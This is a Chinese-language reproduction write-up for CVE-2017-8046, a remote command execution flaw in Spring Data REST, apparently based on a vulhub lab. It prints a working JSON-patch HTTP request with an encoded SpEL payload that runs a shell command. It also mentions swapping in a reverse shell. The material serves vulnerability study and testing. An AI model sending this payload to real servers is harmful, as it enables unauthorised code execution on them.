(CVE-2017-8046)Spring Data Rest 远程命令执行漏洞

一、漏洞简介

Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。

二、漏洞影响

PivotalSpringDataREST2.5.12之前的版本,2.6.7之前的版本,3.0RC3之前的版本

SpringBoot2.0.0M4之前版本

SpringDataKay-RC3之前的版本

三、复现过程

访问http://www.0-sec.org:8080/customers/1,看到一个资源。我们使用PATCH请求来修改之:

  1. PATCH /customers/1 HTTP/1.1
  2. Host: www.0-sec.org:8080
  3. Accept-Encoding: gzip, deflate
  4. Accept: */*
  5. Accept-Language: en
  6. User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  7. Connection: close
  8. Content-Type: application/json-patch+json
  9. Content-Length: 202
  10. [{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]

path的值是SpEL表达式,发送上述数据包,将执行new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}表示的命令touch /tmp/success。然后进入容器docker-compose exec spring bash看看:

2.png

可见,success成功创建。

将bytecode改成反弹shell的命令(注意:Java反弹shell的限制与绕过方式),成功弹回:

1.png

参考链接

https://github.com/vulhub/vulhub/tree/master/spring/CVE-2017-8046